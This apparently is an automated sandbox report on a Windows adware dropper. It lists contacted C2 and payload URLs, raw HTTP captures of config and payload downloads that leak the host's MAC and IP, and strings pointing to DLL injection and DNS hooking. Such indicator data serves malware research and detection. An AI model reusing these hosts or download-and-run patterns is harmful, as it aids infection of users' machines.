.FYFa 409600 393216 393216 5.1687 518f5b687ef25cd9efa4eb3b02d16991

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.iojjek.com/down/20140504201222.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 118.145.16.38
hxxp://www.iojjek.com/down/20140403140535.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 118.145.16.38
hxxp://www.iojjek.com/down/20140404174727.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 118.145.16.38
hxxp://www.iojjek.com/down/20131127183156.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 118.145.16.38
hxxp://a1.p2ptool.com/txt/qtool.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=00533A1092B84F73B9CCC1AD91064DF3 42.159.80.192
hxxp://download.cpudln.com/12/ad22161.exe?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 174.37.172.71
hxxp://a1.p2ptool.com/txt/shock.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=83CAF3E7E328C4F1B414B0565546DA23 42.159.80.192
hxxp://www.iojjek.com/down/20140403140503.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 118.145.16.38
hxxp://a1.p2ptool.com/txt/MiniIE.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=0CF4F544011329985BA796AD74A77901 42.159.80.192
hxxp://a1.p2ptool.com/txt/minie.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=BABC6CF351B7B2C4C859C12DFBD39277 42.159.80.192
hxxp://a1.p2ptool.com/txt/First.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=5D8AFFE78CF6342F0127A967DE092E0A 42.159.80.192
hxxp://a1.p2ptool.com/txt/whitelist.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=25AEE42B466DB1826F98A5F21A9A9C94 42.159.80.192
hxxp://1st.ecoma.glb0.lxdns.com/client/config.ini
hxxp://1st.ecoma.glb0.lxdns.com/attachments/advert/201405/20140505190815.ico
hxxp://download006.rdb.cnc.ccgslb.com.cn/getconfig/minisite.ini
hxxp://1st.ecoma.glb0.lxdns.com/attachments/advert/201405/20140505190854.ico
hxxp://1st.ecoma.glb0.lxdns.com/sh/index.html
hxxp://tt.woai310.com/client/config.ini 209.170.78.73
hxxp://site.minimenhu.com/sh/index.html 209.170.78.73
hxxp://get.woai310.com/getconfig/minisite.ini 221.194.130.5
hxxp://icon.woai310.com/attachments/advert/201405/20140505190854.ico 209.170.78.77
hxxp://icon.woai310.com/client/config.ini 209.170.78.77
hxxp://icon.woai310.com/attachments/advert/201405/20140505190815.ico 209.170.78.77
ad.zzinfor.cn


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN W32/Woai.Dropper Config Request

Traffic

GET /client/config.ini HTTP/1.0
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: icon.woai310.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Mon, 05 May 2014 13:29:59 GMT
Server: Apache
Last-Modified: Mon, 05 May 2014 11:09:53 GMT
ETag: "3f82de-167-4f8a52baea240"
Accept-Ranges: bytes
Content-Length: 359
Content-Type: text/plain
X-Via: 1.1 fra72:5 (Cdn Cache Server V2.0)
Connection: close
[AD192]..id=192..url=hXXp://p.ucwan87.net/s/1/1222/19865.html?uid=9050
30..reg=..name=................ico=hXXp://icon.woai310.com/attachments
/advert/201405/20140505190815.ico..[AD193]..id=193..url=hXXp://youxi.b
aidu.com/yxpm/pm.jsp?pid=101110070500236_2838257..reg=..name=.........
.ico=hXXp://icon.woai310.com/attachments/advert/201405/20140505190854.
ico..


GET /sh/index.html HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: site.minimenhu.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 05 May 2014 13:30:06 GMT
Server: nginx/1.4.4
Content-Type: text/html
Last-Modified: Mon, 05 May 2014 09:34:12 GMT
Transfer-Encoding: chunked
Content-Encoding: gzip
X-Via: 1.1 fra73:6 (Cdn Cache Server V2.0)
Connection: keep-alive
826.............YKo#..>s~E{.K...!.A....k.Q.^.^.6.X.M.9l.g.;....:.w8
@.\b$..<`..8....Z.... 9..!9..K...{..84..6.C.8.]..W..U...s....}.:.c.
..n.:...M...M.|..E...._..l.B.!.#.i.cf...u..y..4...1,.A.....#.d........
.o....m.1?r....JE).Q.[..G8..._$.c:p.f.s... ?yqtNF...U...0".y...ts.....
..o.^.s.`s......3.....P..3R..O.|R3....c.8z.D.......lZ........?~|r.....
~....>...{d<..Vt1.0h.|N.3&p..{H.G2..(.C..=.cF..!\......E....f.Q2
.....1.'...^3'.j..Ak.`^........b.u...a."...u.....d8.?....-6{..u...p..Q
.....1..."......^.G$...,&..7rY..n.y... .o.O...Q...5.........!.c.......
...s.....)...O?IC.Z..5Ex.....!l.@.."....?KC.Y..3E....R..]..;Ex..'..q(.
@([email protected].~...[i.........<|.v*.J..~)].....!.c.c.3.....'...\..
.............y.{o.....{.f.N...!..7?...?}...O.!........}..'.}zz.lP...4u
$7.xk.#=.........#[O.H.......C.. <....x.....C..{..1..}.jQ.-....l.?.
.0..{.E.G.!DzI..a.!m...kY.C...Ni.BQ.tt].6 .C$.6..a...e..1B...N....o:m"
L.[...Z...Y.)/.Ia......Y...R.[.4.[k....m].E..a.....o.bl...w.O}.j..1...
'.{.d/."..S/... ..^.Z.k...Q.KzK.".^i.[...9z.. ....];...u/.Cp.....,=3\q
.=o..N-.....i...s..u..2.....l~.S.......%[email protected]......].C<.
M.......\......I......&e...6~...........D..l...4.n......xq.6S...9.h[.D
f......q?.81..@....~.L;.B...q....L..fLL(...T....1....A'..#...(P.....dI
g.!\..(..}m..P.p..q.....D... .....%*7..f..kD_9A].N.<.........*.|U.~
......Z....!.D..9...1..7\.....7...\V.gg..c..7....^8.l..S...%(.......s.
..P;.......P..v..X..91...:[email protected].$.L.X..#.....1
a...!.q..6.w..i....\.....6! L.6.J.F3.b%.V.2....a.5.8*..c_...k.....

<<< skipped >>>

GET /client/config.ini HTTP/1.0
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: tt.woai310.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Mon, 05 May 2014 13:19:47 GMT
Server: Apache
Last-Modified: Mon, 05 May 2014 10:47:43 GMT
ETag: "3d8761-19e-4f8a4dc6871c0"
Accept-Ranges: bytes
Content-Length: 414
Content-Type: text/plain
Age: 1
X-Via: 1.1 fra72:5 (Cdn Cache Server V2.0)
Connection: close
[u]..[AD452]..id=452..url=hXXp://t.xydhl.com/?eid=638aiOt+ay+fG8cY
0iRI3L+Pk3hy82KNMBAbzJRGCYPG..reg=..[AD454]..id=454..url=hXXp://nbtg
3.youyou234.com/?uid=913189..reg=..[AD455]..id=455..url=hXXp://VVV.myg
ame66.com/213700004.html..reg=..[AD458]..id=458..url=hXXp://num9998.7l
ianmeng.net/ ..reg=..[u]..name=705679..[AD282]..id=282..url=hXXp://tg.
dhelper001.com/goto/jump.php?source=158&aid=40..reg=..


GET /down/20140403140535.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.iojjek.com
Connection: Keep-Alive
nConnection: Close


HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Mon, 05 May 2014 13:26:41 GMT
Content-Type: application/octet-stream
Content-Length: 128924
Last-Modified: Thu, 03 Apr 2014 06:05:35 GMT
Connection: keep-alive
ETag: "533cfa2f-1f79c"
Accept-Ranges: bytes
D....m.7/6.h.>.=...~5...._........0;....".&.....}|.....e.../....t. 
..".Z...p>5.1.R.."...~1....P.v.).<..w..=....{...6...X........)..
....d....v:.x_|..m......!. .4.4...=RP0.7..Z...r....t....U... *........
P...*.b...m$q$%F..\..l..u.....vx..:.nu$..O...G..v.8.4......v..q.la....
Vr...7s.15X.....t.O-/.............x....U..c/[..7..9.R6.m9......F..n...
.V.r.:.1..I..,....Z........?T..|......4r.f.~...L..)7)..!3F..T]...Da...
...7..M.H.t....~E/(.Ac...M_.W.....~...7........j..X...j9.FM/...5..tB..
.H.{..o$ ..o.}....Z.....`.:7...Y.f.c@:3 ..9.-...O.w..yf..J..z.U...F.6.
..8....dq.nA..q.... ...9........E/..,{..?f...4.%.c..........P.....z...
....7....\.T.s.ZO.K.Fz.7=.-..........Dzw.tf...~.Y.K.b......Yn..H......
./.......:%.Y.u..R.(el$.*....v6.g...'.!....._.V..$....|....:....v...7.
6..$}......lyY......q..@./.m...r...(..`.........AD.....]z.t_..n...h'..
J....Em%y...g..J.4...o..........Y[VuF.XQ=o...)..M...p..%e....zg.i..B..
;..X.......\=..9...K<......d.h.'.....}..&.............^.n.1...n;b)$
".............^......6.....#.Jw%Aj.f..D...j......G!6...1.....L.....[..
......S......YH1..fjf%O=t....*.g..ez...C..2g.....@......../..Q...e....
Z._t...h*....T....OrI.......Q9..l..\F_........ .@.(F./."..|E?.l...6F@.
.n"....^$w..V/.Wem5..u0..P.~).vv.(u;3#E.e.w1...EL...H.M.3....g0U..x..:
.n.f...n.DT?1.g..e...`_8A.`.....r.$.z.z..........<...Q.#b......O..g
... .oVg..}'.O..?... .X@[....]..X...I.!..#J.O.j.z.,....YM....)...shSo
[email protected]..'..!<.@...<..;".;.n.`....k.5f..g...R....
...,]`....6.!......|uz.i^Cyd.....\....`Q}I.s.Po..._.\_...}..J.....

<<< skipped >>>

GET /attachments/advert/201405/20140505190854.ico HTTP/1.0
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: icon.woai310.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Mon, 05 May 2014 13:30:03 GMT
Server: Apache
Last-Modified: Mon, 05 May 2014 11:08:54 GMT
ETag: "28d800a-25be-4f8a5282a5d80"
Accept-Ranges: bytes
Content-Length: 9662
Content-Type: image/x-icon
X-Via: 1.1 fra72:3 (Cdn Cache Server V2.0)
Connection: close

<<< skipped >>>

GET /txt/First.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=5D8AFFE78CF6342F0127A967DE092E0A HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: a1.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Mon, 05 May 2014 13:30:18 GMT
Content-Type: text/plain
Content-Length: 55992
Last-Modified: Thu, 31 Oct 2013 07:46:57 GMT
Connection: close
ETag: "52720af1-dab8"
Accept-Ranges: bytes

<<< skipped >>>

GET /down/20140403140503.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.iojjek.com
Connection: Keep-Alive
nConnection: Close


HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Mon, 05 May 2014 13:26:41 GMT
Content-Type: application/octet-stream
Content-Length: 146489
Last-Modified: Thu, 03 Apr 2014 06:05:04 GMT
Connection: keep-alive
ETag: "533cfa10-23c39"
Accept-Ranges: bytes

<<< skipped >>>

GET /down/20140504201222.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.iojjek.com
Connection: Keep-Alive
nConnection: Close


HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Mon, 05 May 2014 13:26:41 GMT
Content-Type: application/octet-stream
Content-Length: 762046
Last-Modified: Sun, 04 May 2014 12:12:23 GMT
Connection: keep-alive
ETag: "53662ea7-ba0be"
Accept-Ranges: bytes

<<< skipped >>>

GET /txt/minie.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=BABC6CF351B7B2C4C859C12DFBD39277 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: a1.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Mon, 05 May 2014 13:30:17 GMT
Content-Type: text/plain
Content-Length: 552288
Last-Modified: Thu, 17 Apr 2014 07:17:37 GMT
Connection: close
ETag: "534f8011-86d60"
Accept-Ranges: bytes

<<< skipped >>>

GET /txt/qtool.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=00533A1092B84F73B9CCC1AD91064DF3 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: a1.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Mon, 05 May 2014 13:30:16 GMT
Content-Type: text/plain
Content-Length: 207544
Last-Modified: Fri, 14 Mar 2014 03:05:39 GMT
Connection: close
ETag: "53227203-32ab8"
Accept-Ranges: bytes

<<< skipped >>>

GET /txt/MiniIE.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=0CF4F544011329985BA796AD74A77901 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: a1.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Mon, 05 May 2014 13:30:16 GMT
Content-Type: text/plain
Content-Length: 362944
Last-Modified: Wed, 23 Oct 2013 18:15:53 GMT
Connection: close
ETag: "52681259-589c0"
Accept-Ranges: bytes

<<< skipped >>>

GET /12/ad22161.exe?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: download.cpudln.com
Connection: Keep-Alive
nConnection: Close


HTTP/1.1 404 Not Found
Date: Mon, 05 May 2014 13:29:53 GMT
Server: Apache
X-Powered-By: PHP/5.5.8
X-Frame-Options: Deny
Content-Length: 1361
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
        <style type="text/css">
            html, body, #partner, iframe {
                height:100%;
                width:100%;
                margin:0;
                padding:0;
                border:0;
                outline:0;
                font-size:100%;
                vertical-align:baseline;
                background:transparent;
            }
            body {
                overflow:hidden;
            }
        </style>
        <meta content="NOW" name="expires">
        <meta content="index, follow, all" name="GOOGLEBOT">
        <meta content="index, follow, all" name="robots">
        <!-- Following Meta-Tag fixes scaling-issues on mobile devices -->
        <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport">
    </head>
    <body>
        <div id="partner"></div>
        <script type="text/javascript">
            document.write(
                '<script type="text/javascript" language="JavaScript"' +
                'src="//sedoparking.com/frmpark/' +
                window.location.host + '/' +
                'sedonewreg' +
                '/park.js">' +
                '<\/script>'
            );
        </script>
    </body>
</html>

<<< skipped >>>

GET /getconfig/minisite.ini HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: get.woai310.com
Connection: Keep-Alive


HTTP/1.0 200 OK
Content-Length: 66
Content-Type: application/octet-stream
Last-Modified: Fri, 02 May 2014 10:25:14 GMT
Accept-Ranges: bytes
ETag: "30877cef065cf1:78e6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 May 2014 10:26:05 GMT
Expires: Tue, 06 May 2014 10:26:05 GMT
Powered-By-ChinaCache: HIT from CNC-YT-3-3OR.3
Age: 11035
Powered-By-ChinaCache: HIT from CNC-YJ-2-3kA
Connection: keep-alive
[cfg]
url=hXXp://site.minimenhu.com/sh/index.html
rate=100/100


GET /attachments/advert/201405/20140505190815.ico HTTP/1.0
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: icon.woai310.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Mon, 05 May 2014 13:30:00 GMT
Server: Apache
Last-Modified: Mon, 05 May 2014 11:08:15 GMT
ETag: "10016f-25be-4f8a525d745c0"
Accept-Ranges: bytes
Content-Length: 9662
Content-Type: image/x-icon
X-Via: 1.1 fra73:0 (Cdn Cache Server V2.0)
Connection: close

<<< skipped >>>

GET /txt/whitelist.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=25AEE42B466DB1826F98A5F21A9A9C94 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: a1.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Mon, 05 May 2014 13:30:20 GMT
Content-Type: text/plain
Content-Length: 3476
Last-Modified: Fri, 22 Nov 2013 08:41:51 GMT
Connection: close
ETag: "528f18cf-d94"
Accept-Ranges: bytes

<<< skipped >>>

GET /down/20131127183156.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.iojjek.com
Connection: Keep-Alive
nConnection: Close


HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Mon, 05 May 2014 13:26:41 GMT
Content-Type: application/octet-stream
Content-Length: 50556
Last-Modified: Wed, 27 Nov 2013 10:31:57 GMT
Connection: keep-alive
ETag: "5295ca1d-c57c"
Accept-Ranges: bytes

<<< skipped >>>

GET /txt/shock.txt?ver=3.180&uid=qing01.4&lip=192.168.150.144&mac=0050563CACD6&p=0&b=0.0.0.0.0&md5=83CAF3E7E328C4F1B414B0565546DA23 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: a1.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Mon, 05 May 2014 13:30:16 GMT
Content-Type: text/plain
Content-Length: 148828
Last-Modified: Thu, 17 Apr 2014 07:55:19 GMT
Connection: close
ETag: "534f88e7-2455c"
Accept-Ranges: bytes

<<< skipped >>>

GET /down/20140404174727.dat?mac=0050563cacd6&lip=192.168.150.144&user=58lm/temptation.bin&ver=10.10.17 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.iojjek.com
Connection: Keep-Alive
nConnection: Close


HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Mon, 05 May 2014 13:26:41 GMT
Content-Type: application/octet-stream
Content-Length: 52808
Last-Modified: Fri, 04 Apr 2014 09:47:27 GMT
Connection: keep-alive
ETag: "533e7faf-ce48"
Accept-Ranges: bytes

<<< skipped >>>

%original file name%.exe_1040:

.text
`.rdata
@.data
.rsrc
@.fyf
<.SSWh
KERNEL32.dll
USER32.dll
ShellExecuteA
SHELL32.dll
_acmdln
MSVCRT.dll
EXE_temp%x%s
EXE_temp0.exe
EXE_temp1.EXE
EXE_temp2.exe
EXE_temp3.exe
EXE_temp4.EXE
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp4.EXE
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
\\.\SSDT
@~MSVCRT3
5A937EE-621D-4F66-8C
fit.exhGET
ngKbytes=%d-
%s\Cxnec
Sw -gU|u.Cj{{
d2
g7http:/
fi.Pz`
msvcrt>
}w%dk8V/
zcÁ
j.rPS\
E:\CODE_P~1\p2
9|!3<3[3
D:\Te
%FinA
KERNEL32.DLL
ADVAPI32.dll
iphlpapi.dll
SHLWAPI.dll
WININET.dll
WS2_32.dll
RegFlushKey
InternetCrackUrlA
.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
u%CNu
TOnAskForKey
OnAskForKeyT
Visit http://www.abyssmedia.com for more info.
cmd.exe /c
command.com /c
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
GetWindowsDirectoryA
GetCPInfo
: :$:(:,:0:4:8:
 -,.4031652,
*)$#"&&%
KWindows
UrlMon
`.data
MSVBVM60.DLL
vb6chs.dll
D:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
VBA6.DLL
1, 0, 3, 916
0, 0, 0, 0
%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s$''%s'' is not a valid component name
Invalid property value List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
%s.Seek not implemented$Operation not allowed on sorted list
Property %s does not exist
Ancestor for '%s' not found
Cannot assign a %s to a %s
Class %s not found%List does not allow duplicates ($0%x)#A component named %s already exists
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation
1. 1. 1. 1
0.0.0.0
"%Program Files%\Internet Explorer\IEXPLORE.EXE" -nohome
WScript.Shell
HKEY_CLASSES_ROOT\http\shell\open\command\
- http://guangnen123.com/
1.00.0001
reg.exe

EXE_temp2.exe_1176:

.text
`.data
.rsrc
MSVBVM60.DLL
vb6chs.dll
D:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
VBA6.DLL
"%Program Files%\Internet Explorer\IEXPLORE.EXE" -nohome
WScript.Shell
HKEY_CLASSES_ROOT\http\shell\open\command\
- http://guangnen123.com/
1.00.0001
reg.exe

EXE_temp3.exe_816:

__MSVCRT_HEAP_SELECT
user32.dll
USER32.dll
58lm/temptation.bin
.IUQT
[.aoH
[8~%xs
 .oN7
z.Tl&
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp3.exe
GetProcessHeap
GetCPInfo
.text
`.rdata
@.data
KERNEL32.DLL

EXE_temp3.exe_816_rwx_00350000_0005A000:

SSSSh
__MSVCRT_HEAP_SELECT
user32.dll
inflate 1.2.3 Copyright 1995-2005 Mark Adler
ERSION.dll
WINDOWS
Find In FileLib, API[%s]
Find In MemLib, API[%s]
API[%s]
Jmp Address: X
API[%s] CodeSize:%d
%s%s%s
:%d: %s
DNS %s->%d.%d.%d.%d
118.145.16.39
www.iiewl.com
118.145.16.38
www.iojjek.com
host:X
127.0.0.1
208.67.222.222
208.67.220.220
114.114.114.114
114.114.115.115
8.8.8.8
8.8.1.1
8.8.4.4
xid:X
sizeof(DNS_QUERY):%d
DNS IP : %d.%d.%d.%d
CNAME : %s
Length : %d
LiveTime : %d
Class : %d
Type : %d
Domain:%s
AdditionalCount:%d
NameServerCount:%d
AnswerCount :%d
QuestionCount :%d
rcode:%d
recvfrom ret:%d
sendto ret:%d
dns_query() Use Dns Server: %s
dns_query() iServer:%d
Shell.Dusn
data_len:%d body_len:%d lphdr->len:%d
Tcp Client Get Config Thread Proc.
downtime:M-d-d d:d:d
%a, %d %b %Y %H:%M:%S
get_hostent(%s,X)
1.2.3
chunk exit, chunk.length:%d chunk_size:%d chunk_size_len:%d
, nCopy:%d
Gzip Unpack, hFile:X
recv_over break_mode:%d recv_len/cont_len:%d/%d body_len/file_len:%d/%d down_ok:%d
%s%sX%s
file_len:%d cont_len:%d header_end_len:%d
, size:%d
conn.s:X
lpHost:%s
, errno:%d
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
bytes=%d-%d
bytes=%d-
HTTP/
HTTP/
, ini->ngroup=%d
i:%d len:%d ini->nline:%d
scan_ini ini->ngroup:%d
NtFunID:%4X dwKiFastSystemCall:X
dwKiFastSystemCall:X
ntdll.dll
ZwQueryValueKey
ZwOpenKey
InjectDll type:%u count:%u %s
g_ipcount:%d
ptable->dwNumEntries:%d
%s->Characteristics:X %d AdapterName:%s
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}
ip:%s
idx:%d Type:%d %s %s
localhost:%d.%d.%d.%d
%-8s: %d
%-8s: %d.%d.%d.%d
%-8s: X-X-X-X-X-X
index:%d mac_str:%s
xxxxxx
ITA %s->%s
, cmp=%d
kvs.size=%d
lpBaseAddress:x dwReadLen:%d
FileSize:%d
M-d-d d:d:d
%SystemRoot%\System32\mswsock.dll
Tcpip
SupportedNameSpace
%SystemRoot%\System32\winrnr.dll
%SystemRoot%\system32\mswsock.dll
%SystemRoot%\system32\rsvpsp.dll
|%SystemRoot%\system32\rsvpsp.dll
mswsock.dll
uncompress res:%d des_len:%d
uncompress x:X src_len:%d des_len:%d
uncompress crc:X X
User:%s
GetModuleFileNameW:X
GetModuleFileNameA:X
GetModuleHandleW:X
GetModuleHandleA:X
InitResult:%d
MemLoad szAppModule:%s
pDllMain:X
pMemoryAddress:X
BaseAddress pMemoryAddress:X
CalcTotalImageSize= %d
Not Found Dll: %s
%s ModuleHandle:X
Name:X FirstThunk:X OriginalFirstThunk:X
Frist Import Table:X
No Import Table
GetExeModule:%s
GetExeModule
d-d-d d:d:d
i:%d [%s] n_errno:%d
Ntp iStart:%d
http://www.iojjek.com/
http://www.iiewl.com/
SendMsg uMsg:%d dwResult:%d,
DownloadUriFromServer url:%s
%d.%d.%d
%d.%d.%d.%d
, bRet:%d
buff.is_down_ok:%d response->code:%d
, ret=%d buffer.body_Len=%d is_down_ok:%d can_break_points_transfer:%d
http://
Muxtex[%d]
%s, m_down_from_server:%d
buffer.length:%d
****:%s
[%d.%d.%d.%d:%d]
(%d):%s
, length:%d
szBackPath:%s
.ELOG
Bind Port:%d
ATL:X
RegQueryValueExA %s
User32.dll
RegOpenKeyExA
ADVAPI32.dll
RegOpenKeyExW
kernel32.dll
MY_RegOpenKeyExA:%s
\ext\settings\{11f09afe-75ad-4e52-ab43-e09e9351ce17}
RegOpenKeyExA:%s
software\policies\microsoft\windows nt\dnsclient
RegisterWindowMessageA:%s
NtCreateProcessEx hPrcess:X
NtCreateProcessEx dwParentPid:%d
NtCreateProcessEx ProcessHandle:X ParentProcess:X
dwParentPid:%d
Module:%s
dwRtlUserThreadStart:X
SysVersion:%d.%d.%d
ole32.dll
LoadPE(ole32.dll)
ole32.dll
dnsapi.dll
LoadPE(dnsapi.dll)
dnsapi.dll
wininet.dll
LoadPE(wininet.dll)
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestW
HttpOpenRequestA
wininet.dll
ws2_32.dll
LoadPE(ws2_32.dll)
